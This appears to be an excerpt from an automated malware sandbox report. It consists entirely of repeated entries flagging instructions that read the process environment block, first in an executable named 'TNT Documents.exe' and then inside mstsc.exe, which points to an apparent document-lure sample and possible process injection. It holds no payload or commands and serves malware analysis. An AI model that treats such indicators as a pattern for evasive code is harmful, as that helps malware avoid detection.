Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156D5E0 mov eax, dword ptr fs:[00000030h] 7_2_0156D5E0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156D5E0 mov eax, dword ptr fs:[00000030h] 7_2_0156D5E0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158FD9B mov eax, dword ptr fs:[00000030h] 7_2_0158FD9B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158FD9B mov eax, dword ptr fs:[00000030h] 7_2_0158FD9B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_016205AC mov eax, dword ptr fs:[00000030h] 7_2_016205AC
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_016205AC mov eax, dword ptr fs:[00000030h] 7_2_016205AC
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582581 mov eax, dword ptr fs:[00000030h] 7_2_01582581
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582581 mov eax, dword ptr fs:[00000030h] 7_2_01582581
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582581 mov eax, dword ptr fs:[00000030h] 7_2_01582581
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582581 mov eax, dword ptr fs:[00000030h] 7_2_01582581
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h] 7_2_01552D8A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h] 7_2_01552D8A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h] 7_2_01552D8A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h] 7_2_01552D8A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01552D8A mov eax, dword ptr fs:[00000030h] 7_2_01552D8A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01581DB5 mov eax, dword ptr fs:[00000030h] 7_2_01581DB5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01581DB5 mov eax, dword ptr fs:[00000030h] 7_2_01581DB5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01581DB5 mov eax, dword ptr fs:[00000030h] 7_2_01581DB5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015835A1 mov eax, dword ptr fs:[00000030h] 7_2_015835A1
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EC450 mov eax, dword ptr fs:[00000030h] 7_2_015EC450
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EC450 mov eax, dword ptr fs:[00000030h] 7_2_015EC450
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158A44B mov eax, dword ptr fs:[00000030h] 7_2_0158A44B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157746D mov eax, dword ptr fs:[00000030h] 7_2_0157746D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h] 7_2_015D6C0A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h] 7_2_015D6C0A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h] 7_2_015D6C0A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6C0A mov eax, dword ptr fs:[00000030h] 7_2_015D6C0A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h] 7_2_01611C06
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h] 7_2_01611C06
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h] 7_2_01611C06
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h] 7_2_01611C06
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h] 7_2_01611C06
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h] 7_2_01611C06
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h] 7_2_01611C06
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h] 7_2_01611C06
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h] 7_2_01611C06
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h] 7_2_01611C06
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h] 7_2_01611C06
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h] 7_2_01611C06
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h] 7_2_01611C06
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611C06 mov eax, dword ptr fs:[00000030h] 7_2_01611C06
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0162740D mov eax, dword ptr fs:[00000030h] 7_2_0162740D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0162740D mov eax, dword ptr fs:[00000030h] 7_2_0162740D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0162740D mov eax, dword ptr fs:[00000030h] 7_2_0162740D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158BC2C mov eax, dword ptr fs:[00000030h] 7_2_0158BC2C
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_016114FB mov eax, dword ptr fs:[00000030h] 7_2_016114FB
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6CF0 mov eax, dword ptr fs:[00000030h] 7_2_015D6CF0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6CF0 mov eax, dword ptr fs:[00000030h] 7_2_015D6CF0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6CF0 mov eax, dword ptr fs:[00000030h] 7_2_015D6CF0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628CD6 mov eax, dword ptr fs:[00000030h] 7_2_01628CD6
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156849B mov eax, dword ptr fs:[00000030h] 7_2_0156849B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628F6A mov eax, dword ptr fs:[00000030h] 7_2_01628F6A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156EF40 mov eax, dword ptr fs:[00000030h] 7_2_0156EF40
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156FF60 mov eax, dword ptr fs:[00000030h] 7_2_0156FF60
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157F716 mov eax, dword ptr fs:[00000030h] 7_2_0157F716
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EFF10 mov eax, dword ptr fs:[00000030h] 7_2_015EFF10
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EFF10 mov eax, dword ptr fs:[00000030h] 7_2_015EFF10
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158A70E mov eax, dword ptr fs:[00000030h] 7_2_0158A70E
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158A70E mov eax, dword ptr fs:[00000030h] 7_2_0158A70E
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158E730 mov eax, dword ptr fs:[00000030h] 7_2_0158E730
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0162070D mov eax, dword ptr fs:[00000030h] 7_2_0162070D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0162070D mov eax, dword ptr fs:[00000030h] 7_2_0162070D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01554F2E mov eax, dword ptr fs:[00000030h] 7_2_01554F2E
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01554F2E mov eax, dword ptr fs:[00000030h] 7_2_01554F2E
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015937F5 mov eax, dword ptr fs:[00000030h] 7_2_015937F5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01568794 mov eax, dword ptr fs:[00000030h] 7_2_01568794
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D7794 mov eax, dword ptr fs:[00000030h] 7_2_015D7794
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D7794 mov eax, dword ptr fs:[00000030h] 7_2_015D7794
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D7794 mov eax, dword ptr fs:[00000030h] 7_2_015D7794
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h] 7_2_01567E41
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h] 7_2_01567E41
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h] 7_2_01567E41
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h] 7_2_01567E41
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h] 7_2_01567E41
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01567E41 mov eax, dword ptr fs:[00000030h] 7_2_01567E41
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h] 7_2_0157AE73
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h] 7_2_0157AE73
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h] 7_2_0157AE73
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h] 7_2_0157AE73
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157AE73 mov eax, dword ptr fs:[00000030h] 7_2_0157AE73
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161AE44 mov eax, dword ptr fs:[00000030h] 7_2_0161AE44
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161AE44 mov eax, dword ptr fs:[00000030h] 7_2_0161AE44
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156766D mov eax, dword ptr fs:[00000030h] 7_2_0156766D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158A61C mov eax, dword ptr fs:[00000030h] 7_2_0158A61C
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158A61C mov eax, dword ptr fs:[00000030h] 7_2_0158A61C
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155C600 mov eax, dword ptr fs:[00000030h] 7_2_0155C600
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155C600 mov eax, dword ptr fs:[00000030h] 7_2_0155C600
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155C600 mov eax, dword ptr fs:[00000030h] 7_2_0155C600
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01588E00 mov eax, dword ptr fs:[00000030h] 7_2_01588E00
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0160FE3F mov eax, dword ptr fs:[00000030h] 7_2_0160FE3F
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01611608 mov eax, dword ptr fs:[00000030h] 7_2_01611608
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155E620 mov eax, dword ptr fs:[00000030h] 7_2_0155E620
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015836CC mov eax, dword ptr fs:[00000030h] 7_2_015836CC
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01598EC7 mov eax, dword ptr fs:[00000030h] 7_2_01598EC7
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0160FEC0 mov eax, dword ptr fs:[00000030h] 7_2_0160FEC0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628ED6 mov eax, dword ptr fs:[00000030h] 7_2_01628ED6
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015676E2 mov eax, dword ptr fs:[00000030h] 7_2_015676E2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015816E0 mov ecx, dword ptr fs:[00000030h] 7_2_015816E0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h] 7_2_01620EA5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h] 7_2_01620EA5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01620EA5 mov eax, dword ptr fs:[00000030h] 7_2_01620EA5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EFE87 mov eax, dword ptr fs:[00000030h] 7_2_015EFE87
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D46A7 mov eax, dword ptr fs:[00000030h] 7_2_015D46A7
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D7D50 mov eax, dword ptr fs:[00000030h] 17_2_055D7D50
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F3D43 mov eax, dword ptr fs:[00000030h] 17_2_055F3D43
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05633540 mov eax, dword ptr fs:[00000030h] 17_2_05633540
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DC577 mov eax, dword ptr fs:[00000030h] 17_2_055DC577
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DC577 mov eax, dword ptr fs:[00000030h] 17_2_055DC577
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0563A537 mov eax, dword ptr fs:[00000030h] 17_2_0563A537
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05688D34 mov eax, dword ptr fs:[00000030h] 17_2_05688D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567E539 mov eax, dword ptr fs:[00000030h] 17_2_0567E539
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h] 17_2_055E4D3B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h] 17_2_055E4D3B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E4D3B mov eax, dword ptr fs:[00000030h] 17_2_055E4D3B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C3D34 mov eax, dword ptr fs:[00000030h] 17_2_055C3D34
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055BAD30 mov eax, dword ptr fs:[00000030h] 17_2_055BAD30
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h] 17_2_0567FDE2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h] 17_2_0567FDE2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h] 17_2_0567FDE2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567FDE2 mov eax, dword ptr fs:[00000030h] 17_2_0567FDE2
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05668DF1 mov eax, dword ptr fs:[00000030h] 17_2_05668DF1
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h] 17_2_05636DC9
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h] 17_2_05636DC9
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h] 17_2_05636DC9
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636DC9 mov ecx, dword ptr fs:[00000030h] 17_2_05636DC9
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h] 17_2_05636DC9
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636DC9 mov eax, dword ptr fs:[00000030h] 17_2_05636DC9
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CD5E0 mov eax, dword ptr fs:[00000030h] 17_2_055CD5E0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CD5E0 mov eax, dword ptr fs:[00000030h] 17_2_055CD5E0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056805AC mov eax, dword ptr fs:[00000030h] 17_2_056805AC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056805AC mov eax, dword ptr fs:[00000030h] 17_2_056805AC
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EFD9B mov eax, dword ptr fs:[00000030h] 17_2_055EFD9B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EFD9B mov eax, dword ptr fs:[00000030h] 17_2_055EFD9B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h] 17_2_055B2D8A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h] 17_2_055B2D8A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h] 17_2_055B2D8A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h] 17_2_055B2D8A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B2D8A mov eax, dword ptr fs:[00000030h] 17_2_055B2D8A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h] 17_2_055E2581
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h] 17_2_055E2581
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h] 17_2_055E2581
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E2581 mov eax, dword ptr fs:[00000030h] 17_2_055E2581
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h] 17_2_055E1DB5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h] 17_2_055E1DB5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E1DB5 mov eax, dword ptr fs:[00000030h] 17_2_055E1DB5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055E35A1 mov eax, dword ptr fs:[00000030h] 17_2_055E35A1
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EA44B mov eax, dword ptr fs:[00000030h] 17_2_055EA44B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055D746D mov eax, dword ptr fs:[00000030h] 17_2_055D746D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564C450 mov eax, dword ptr fs:[00000030h] 17_2_0564C450
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564C450 mov eax, dword ptr fs:[00000030h] 17_2_0564C450
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05671C06 mov eax, dword ptr fs:[00000030h] 17_2_05671C06
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0568740D mov eax, dword ptr fs:[00000030h] 17_2_0568740D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0568740D mov eax, dword ptr fs:[00000030h] 17_2_0568740D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0568740D mov eax, dword ptr fs:[00000030h] 17_2_0568740D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h] 17_2_05636C0A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h] 17_2_05636C0A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h] 17_2_05636C0A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636C0A mov eax, dword ptr fs:[00000030h] 17_2_05636C0A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EBC2C mov eax, dword ptr fs:[00000030h] 17_2_055EBC2C
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h] 17_2_05636CF0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h] 17_2_05636CF0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05636CF0 mov eax, dword ptr fs:[00000030h] 17_2_05636CF0
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_056714FB mov eax, dword ptr fs:[00000030h] 17_2_056714FB
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05688CD6 mov eax, dword ptr fs:[00000030h] 17_2_05688CD6
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C849B mov eax, dword ptr fs:[00000030h] 17_2_055C849B
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05688F6A mov eax, dword ptr fs:[00000030h] 17_2_05688F6A
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CEF40 mov eax, dword ptr fs:[00000030h] 17_2_055CEF40
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055CFF60 mov eax, dword ptr fs:[00000030h] 17_2_055CFF60
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DF716 mov eax, dword ptr fs:[00000030h] 17_2_055DF716
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EA70E mov eax, dword ptr fs:[00000030h] 17_2_055EA70E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EA70E mov eax, dword ptr fs:[00000030h] 17_2_055EA70E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0568070D mov eax, dword ptr fs:[00000030h] 17_2_0568070D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0568070D mov eax, dword ptr fs:[00000030h] 17_2_0568070D
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055EE730 mov eax, dword ptr fs:[00000030h] 17_2_055EE730
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564FF10 mov eax, dword ptr fs:[00000030h] 17_2_0564FF10
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0564FF10 mov eax, dword ptr fs:[00000030h] 17_2_0564FF10
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B4F2E mov eax, dword ptr fs:[00000030h] 17_2_055B4F2E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055B4F2E mov eax, dword ptr fs:[00000030h] 17_2_055B4F2E
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055F37F5 mov eax, dword ptr fs:[00000030h] 17_2_055F37F5
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C8794 mov eax, dword ptr fs:[00000030h] 17_2_055C8794
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05637794 mov eax, dword ptr fs:[00000030h] 17_2_05637794
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05637794 mov eax, dword ptr fs:[00000030h] 17_2_05637794
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_05637794 mov eax, dword ptr fs:[00000030h] 17_2_05637794
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h] 17_2_055C7E41
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h] 17_2_055C7E41
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h] 17_2_055C7E41
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h] 17_2_055C7E41
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h] 17_2_055C7E41
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055C7E41 mov eax, dword ptr fs:[00000030h] 17_2_055C7E41
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567AE44 mov eax, dword ptr fs:[00000030h] 17_2_0567AE44
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_0567AE44 mov eax, dword ptr fs:[00000030h] 17_2_0567AE44
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h] 17_2_055DAE73
Source: C:\Windows\SysWOW64\mstsc.exe Code function: 17_2_055DAE73 mov eax, dword ptr fs:[00000030h] 17_2_055DAE73
